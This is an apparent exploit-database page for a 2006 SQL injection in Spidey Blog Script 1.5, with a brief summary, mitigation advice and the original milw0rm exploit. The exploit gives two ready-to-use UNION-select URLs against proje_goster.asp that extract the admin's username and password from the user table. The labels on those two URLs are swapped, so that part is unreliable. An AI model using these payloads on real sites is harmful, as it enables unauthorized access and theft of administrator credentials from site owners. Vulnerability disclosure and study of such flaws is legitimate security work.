Spidey Blog Script - exploit.company

vendor:

Spidey Blog Script

by:

ASIANEAGLE

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Spidey Blog Script

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability

A SQL injection vulnerability exists in Spidey Blog Script version 1.5 (tr). An attacker can exploit this vulnerability to gain access to the admin credentials by sending a specially crafted HTTP request to the vulnerable application. The request contains malicious SQL statements that are executed in the backend database.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to detect malicious input.

Source

Exploit-DB raw data:

###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability  #
#Author : ASIANEAGLE                                          #
#Site   : www.asianeagle.org                                  #
#Contact: admin@asianeagle.org                                #
###############################################################
#Risk   : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar


#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201

#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201


#Greetz: Str0ke
Forever milw0rm ;)

# milw0rm.com [2006-08-14]